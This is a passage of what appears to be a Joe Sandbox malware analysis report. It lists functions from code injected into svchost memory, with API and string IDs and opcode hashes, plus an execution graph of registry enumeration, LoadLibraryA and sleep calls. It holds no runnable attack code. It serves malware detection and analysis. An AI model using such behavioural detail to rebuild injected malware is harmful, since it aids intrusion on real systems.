                                                                      • Instruction ID: 53032330eb2a6da8034d978688d882b7e120780e33b779c8a0d6604ede2127e4
                                                                      • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction Fuzzy Hash: E002CB7221EB8586E760CB56F4947AAB7A1F3C4794F184025EACE87BA9DF7CC454CB00
                                                                      Function 000001FB539C5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction ID: 35d6f73adecf76b2e3ecaee93454b03218b5995e470e293602ffafe4bc405b43
                                                                      • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction Fuzzy Hash: DE61BDB651EB49C6E760CB16E49436AB7A2F388794F581125EA8F47BB8DB7CC540CF00
                                                                      Function 000001FB539D4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: f9a8c0488bc3d4deea02a29900cc9a1534e547037d25a2bef2725409dacae6a9
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: E8118FF6A1AA9321FA64556AD4D73F612536B783E8E0C0E34A9770E7F6CF2CC8614601
                                                                      Function 000001FB539A3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 5d1ff030d00cd2d713d849fa80cc5a6bdae8e42945106595b2b3d385686a6c18
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: CC1191B2A1EB1311FAA615ECE4D53F911D36B58374F4C9738AD6B06FF68B2CC8415500
                                                                      Function 000001FB5399F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: f68e625ba7acd24a59fe08d2c251c553b64a170b309e681ffe222c22834a18b8
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 9661A1F360E24242FA698B64D4E03FEA7A3E745742F5D4535CA1B177B4DB3CC8458A60
                                                                      Function 000001FB539CAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: bedfb9b5bf910b629efd52c6bf81bea48cf952128bd26ee9357b23212e3a9e3e
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 27614C7261AB898AE710DF65D4803ED77A2F348B88F084225EF4A17BA9DB3CD555C701
                                                                      Function 000001FB539CAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: dab5994280bf0e8b86b40aef4342addec26e55d86bcc80a1a6ecae4785b560e1
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 1051C0B212938A8AEB748F15D5C43B977A2F755B94F1C4135DA8A47BE5CB3CC450C702
                                                                      Function 000001FB5399A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: e67ae822c152f91a8f128c44beafeeb84265359930fac9f4cc8cbbf4076c63b1
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: B8519FB3109282CAEB748B15D4A43AD77A2F359B94F1C5125DA9A87BA5CB3CD460CF02
                                                                      Function 000001FB53998405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: c962e0a8b14c83a09ed27bc9a3309a2cbfdf0f654e531ad194cbd062dad2bbc8
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 7851A0B371E2028BEB56CB15D494BE8379AF354B98F588178DA07477A8EB38CC45CB05
                                                                      Function 000001FB539983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 608a93562e2c18e35ab68ab54ccf2d1a6f83fad5714ed2d3758c5d6ebae4ab62
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: 1431BEB321E641D6E712DF11E8947E937AAF740B88F088128EE4B077A8CB3CC940CB05
                                                                      Function 000001FB539D2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: 70b94840535153a2c256647204e39846594304de18c1bbc617468f21897222c2
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: D0D105B271AA8189F711CF75D4803EC7BB2F754798F188625CE9A97BA9DB38C406C340
                                                                      Function 000001FB539C14A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: bdc4653b437380b3f3f4ca15b24486875ab127c3d64caf90ce25882780f20bf3
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: 0901807260AAD6D6E704DF62E8851AA67A2F749FC1F484834DA8A43725DF38C051C740
                                                                      Function 000001FB539D2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: 40f7c5f63300661cd661e55aa19decf58a802a22f31068c6dfd4796ed8c75239
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: D291E4B270A65285F7609F65D4C23FDABA2B705B88F1C4529DE8B577A4DB7DC842C300
                                                                      Function 000001FB539C7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: defa4ae0642d6a32399fd8954af5e6e6148f63eaf2e33393bd27ecb724b6d61b
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: 31115A72715F428AEB00CF61E8953B933A4F319759F480E31DA6E867A4DB7CC1988380
                                                                      Function 000001FB539C253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: bb72addb5a8917fd1520e25578be5bde8718d817993148d3e88a25d5e77b9b06
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: 7571A4B620978685EB25DF29D8C43FAA7A6F385784F4C0036DD8B53BA9DB3DC6458700
                                                                      Function 000001FB53999E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 3341bbce40f2fc636230826d8423e9b0d65deab6b2a0a9c3cd1c9539a72497e8
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 7761927360AB468AEB10DF65D4907ED77A2F344B88F084225EF4A17BA8DB38D595CB00
                                                                      Function 000001FB539C2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: 1e2d7e75fcec33aae6cfda06d1fedda4746025f1c3ce262bf2523ed21a116398
                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: 305184B220E78B82EA64DA29E4D83FAE792F395740F4D0135DD9B03B6ADB3DC5058740
                                                                      Function 000001FB539D26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: ecc2ab4eee834b5eb349c99eeea2a38c23bc3884ca80047f2a69e4f6d83fdaf1
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: FB41A8B271AA8185EB20DF25E4853F9B7A1F798794F584431EE8E877A4DB7CC441C740
                                                                      Function 000001FB539C94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: 0434695ab50d31999ccfb44931bc123f96a23a80cf5f0d546cb8bc6dfc13b013
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: E6112B76219B8582EB618B15E4803A9B7E6FB88B94F5C4225EE8D07B69DF3CC551CB00
                                                                      Function 000001FB53997356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: c69f2d03e7c10632b7f5d63e6c16b7762b360b625939375ae85a8f999810678c
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: 2EE086B1749B4590DF028F21E8902E833A1DBA8B64F8C9232995D0A321FB3CD5E9C301
                                                                      Function 000001FB539973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: f00d30d7b76d42afc42083ec7512426173d9921f52db44da75f216fa2e63f94c
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: 2EE086B1709B4590DF028F21E8901E87361E7A8B54F8C9232C94D0A321EB3CD5E5C300
                                                                      Function 000001FB539C1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 6aa450c30a7baaebf75d86072b728c595605062254c08432bf4957f3f5be0a0b
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: B6116375606B8A81FA04DB56D4852BA67A2F789FC0F5C4035DE4E43775DF3CC4418340
                                                                      Function 000001FB539C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction ID: 5be64a25ae3680dda377404a020bb3eed52e059bff3fe1fe1c5071d9c80fb988
                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction Fuzzy Hash: 18E0657560264586F7048F92D84939B3BE2FB89F45F48C424C94A07361DF7D8495C750

                                                                      Execution Graph

                                                                      Execution Coverage:0.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:66
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph 14819 1cbd8ba273c 14821 1cbd8ba276a 14819->14821 14820 1cbd8ba2858 LoadLibraryA 14820->14821 14821->14820 14822 1cbd8ba28d4 14821->14822 14823 1cbd8bd1abc 14828 1cbd8bd1628 GetProcessHeap HeapAlloc 14823->14828 14825 1cbd8bd1acb 14826 1cbd8bd1ad2 Sleep SleepEx 14825->14826 14827 1cbd8bd1598 StrCmpIW StrCmpW 14825->14827 14826->14825 14827->14825 14872 1cbd8bd1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14828->14872 14830 1cbd8bd1650 14873 1cbd8bd1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14830->14873 14832 1cbd8bd1661 14874 1cbd8bd1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14832->14874 14834 1cbd8bd166a 14875 1cbd8bd1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14834->14875 14836 1cbd8bd1673 14837 1cbd8bd168e RegOpenKeyExW 14836->14837 14838 1cbd8bd18a6 14837->14838 14839 1cbd8bd16c0 RegOpenKeyExW 14837->14839 14838->14825 14840 1cbd8bd16e9 14839->14840 14841 1cbd8bd16ff RegOpenKeyExW 14839->14841 14876 1cbd8bd12bc RegQueryInfoKeyW 14840->14876 14843 1cbd8bd173a RegOpenKeyExW 14841->14843 14844 1cbd8bd1723 14841->14844 14846 1cbd8bd1775 RegOpenKeyExW 14843->14846 14847 1cbd8bd175e 14843->14847 14885 1cbd8bd104c RegQueryInfoKeyW 14844->14885 14851 1cbd8bd1799 14846->14851 14852 1cbd8bd17b0 RegOpenKeyExW 14846->14852 14850 1cbd8bd12bc 16 API calls 14847->14850 14853 1cbd8bd176b RegCloseKey 14850->14853 14854 1cbd8bd12bc 16 API calls 14851->14854 14855 1cbd8bd17d4 14852->14855 14856 1cbd8bd17eb RegOpenKeyExW 14852->14856 14853->14846 14857 1cbd8bd17a6 RegCloseKey 14854->14857 14858 1cbd8bd12bc 16 API calls 14855->14858 14859 1cbd8bd1826 RegOpenKeyExW 14856->14859 14860 1cbd8bd180f 14856->14860 14857->14852 14864 1cbd8bd17e1 RegCloseKey 14858->14864 14862 1cbd8bd184a 14859->14862 14863 1cbd8bd1861 RegOpenKeyExW 14859->14863 14861 1cbd8bd104c 6 API calls 14860->14861 14865 1cbd8bd181c RegCloseKey 14861->14865 14866 1cbd8bd104c 6 API calls 14862->14866 14867 1cbd8bd1885 14863->14867 14868 1cbd8bd189c RegCloseKey 14863->14868 14864->14856 14865->14859 14869 1cbd8bd1857 RegCloseKey 14866->14869 14870 1cbd8bd104c 6 API calls 14867->14870 14868->14838 14869->14863 14871 1cbd8bd1892 RegCloseKey 14870->14871 14871->14868 14872->14830 14873->14832 14874->14834 14875->14836 14877 1cbd8bd1327 GetProcessHeap HeapAlloc 14876->14877 14878 1cbd8bd148a RegCloseKey 14876->14878 14879 1cbd8bd1476 GetProcessHeap HeapFree 14877->14879 14880 1cbd8bd1352 RegEnumValueW 14877->14880 14878->14841 14879->14878 14881 1cbd8bd13a5 14880->14881 14881->14879 14881->14880 14883 1cbd8bd13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14881->14883 14884 1cbd8bd141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14881->14884 14890 1cbd8bd152c 14881->14890 14883->14884 14884->14881 14886 1cbd8bd11b5 RegCloseKey 14885->14886 14887 1cbd8bd10bf 14885->14887 14886->14843 14887->14886 14888 1cbd8bd10cf RegEnumValueW 14887->14888 14889 1cbd8bd114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14887->14889 14888->14887 14889->14887 14891 1cbd8bd1546 14890->14891 14894 1cbd8bd157c 14890->14894 14892 1cbd8bd1565 StrCmpW 14891->14892 14893 1cbd8bd155d StrCmpIW 14891->14893 14891->14894 14892->14891 14893->14891 14894->14881

                                                                      Executed Functions

                                                                      Function 000001CBD8BD1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction ID: 3351c60c845fd7169fdfdb9f14dc5b268d6217c379f2eec7515d69f6ca4aac72
                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction Fuzzy Hash: 82E039356417048AFB068BE2D8497AA36E1EB9AB1AF049028890A47351DF7EC499C791
                                                                      Function 000001CBD8BD328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
